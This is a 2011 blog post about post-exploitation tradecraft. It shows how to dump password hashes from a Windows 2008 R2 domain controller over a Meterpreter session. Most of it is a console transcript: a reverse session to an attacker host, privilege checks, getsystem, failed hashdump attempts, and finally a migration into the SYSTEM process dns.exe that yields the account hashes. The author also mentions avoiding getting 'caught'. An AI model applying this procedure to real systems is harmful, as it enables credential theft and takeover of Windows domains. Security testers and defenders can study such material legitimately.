Dumping Hashes on Win2k8 R2 x64 with Metasploit

Wednesday, June 01, 2011

Rob Fuller

D8853ae281be8cfdfa18ab73608e8c3f

When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the "The parameter is incorrect" error in Meterpreter.

So I've had to fall back on dropping binaries which I really don't like doing because of the added clean up and chance of getting 'caught'.

Well, with a bit of migration you'll be back to passing the hash. Here is how, with a bit of the thought process first:

       =[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12622 updated today (2011.05.15)

msf >
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011

msf > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
System Language : en_US
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer        : DOMAINCONTROLLE
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32

meterpreter > ps

Process list
============

PID -  Name  -  Arch - Session - User    -     Path
 
0     [System Process]
 
4     System        x64   0
 
224   smss.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\smss.exe
 
324   csrss.exe    x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\csrss.exe
 
364   csrss.exe    x64   1  NT AUTHORITY\SYSTEM  C:\Windows\System32\csrss.exe
 
372   wininit.exe  x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\wininit.exe
 
404   winlogon.exe  x64   1  NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe
 
468   services.exe  x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe
 
476   lsass.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
 
484   lsm.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\lsm.exe
 
628   svchost.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 
708   svchost.exe   x64   0  NT AUTHORITY\NETWORK C:\Windows\System32\svchost.exe
 
804   svchost.exe    x64   0  NT AUTHORITY\LOCAL   C:\Windows\System32\svchost.exe
 
836   svchost.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 
880   svchost.exe   x64   0  NT AUTHORITY\LOCAL   C:\Windows\System32\svchost.exe
 
932   svchost.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 
972   svchost.exe   x64   0  NT AUTHORITY\NETWORK C:\Windows\System32\svchost.exe
 
328   svchost.exe   x64   0  NT AUTHORITY\LOCAL   C:\Windows\System32\svchost.exe
 
1172  spoolsv.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
 
1204  Microsoft.ActiveDirectory.WebServices.exe 
                               x64   0  NT AUTHORITY\SYSTEM  C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 
1252  dfsrs.exe    x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\dfsrs.exe
 
1288  dns.exe      x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\dns.exe
 
1316  ismserv.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\ismserv.exe
 
1360  svchost.exe   x64   0  NT AUTHORITY\LOCAL   C:\Windows\System32\svchost.exe
 
1392  vmtoolsd.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 
1464  wlms.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\wlms\wlms.exe
 
1492  dfssvc.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\dfssvc.exe
 
1572  VMUpgradeHelper.exe
                             x64   0  NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 
1896  TPAutoConnSvc.exe
                             x64   0  NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 
2016  vds.exe    x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\vds.exe
 
872   sppsvc.exe   x64   0  NT AUTHORITY\NETWORK C:\Windows\System32\sppsvc.exe
 
1268  WmiPrvSE.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\System32\wbem\WmiPrvSE.exe
 
2360  taskhost.exe   x64   1  SITTINGDUCK\juser    C:\Windows\System32\taskhost.exe
 
2424  dwm.exe    x64   1  SITTINGDUCK\juser    C:\Windows\System32\dwm.exe
 
2452  explorer.exe   x64   1  SITTINGDUCK\juser    C:\Windows\explorer.exe
 
2504  TPAutoConnect.exe
                                 x64   1  SITTINGDUCK\juser    C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 
2512  conhost.exe   x64   1  SITTINGDUCK\juser    C:\Windows\System32\conhost.exe
 
2632  VMwareTray.exe  x64   1  SITTINGDUCK\juser    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 
2640  VMwareUser.exe  x64   1  SITTINGDUCK\juser    C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 
2716  mmc.exe         x64   1  SITTINGDUCK\juser    C:\Windows\System32\mmc.exe
 
3052  mscorsvw.exe    x86   0  NT AUTHORITY\SYSTEM  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 
2216  TrustedInstaller.exe
                      x64   0  NT AUTHORITY\SYSTEM  C:\Windows\servicing\TrustedInstaller.exe
 
1932  mscorsvw.exe   x64   0  NT AUTHORITY\SYSTEM  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 
2564  svchost.exe   x64   0  NT AUTHORITY\LOCAL   C:\Windows\System32\svchost.exe
 
1732  msdtc.exe    x64   0  NT AUTHORITY\NETWORK C:\Windows\System32\msdtc.exe
 
2992  notepad.exe   x86   1  SITTINGDUCK\juser    C:\Windows\SysWOW64\notepad.exe
 
1720  notepad.exe  x64   1  SITTINGDUCK\juser    C:\Windows\System32\notepad.exe


meterpreter > getpid
Current pid: 2992

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ah, the wonderful 'The parameter is incorrect' error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn't the issue, but lets do a 'getprivs' just in case:

meterpreter > getprivs   
=========================================

Enabled Process Privileges
=========================================

  SeDebugPrivilege
  SeIncreaseQuotaPrivilege
  SeMachineAccountPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemProfilePrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeRemoteShutdownPrivilege
  SeUndockPrivilege
  SeEnableDelegationPrivilege
  SeManageVolumePrivilege

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Boo.. Ok, so maybe we have to be 'SYSTEM'...

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.


Still nothing... Maybe it requires that we be in a 64 bit process... PID 1720 was 64 bit version of Notepad, lets try that...

meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Damn, what about as 'SYSTEM'...

meterpreter > getsystem ...got system (via technique 1). 

meterpreter > hashdump

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

No joy.. hmmm What about a 'SYSTEM' process that was already there.. 'dns.exe' PID 1288 should be good...

meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

meterpreter >

w00t.

So I don't know why, but it seems that you have to be in a 'SYSTEM' process who's primary token (started by SYSTEM) is SYSTEM (since 'getsystem' wasn't working).

I also tried this getting SYSTEM to run a 32 bit process, and was still unable to dump hashes.

So next time you're on an Win2k8 R2 64 bit box, remember to migrate into a pre-existing 64bit SYSTEM process and you should be good to go.

Cross-posted from Room362

Possibly Related Articles:
24164
Network->General
Information Security
Metasploit Hashes Network Security Administration Systems Meterpreter
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.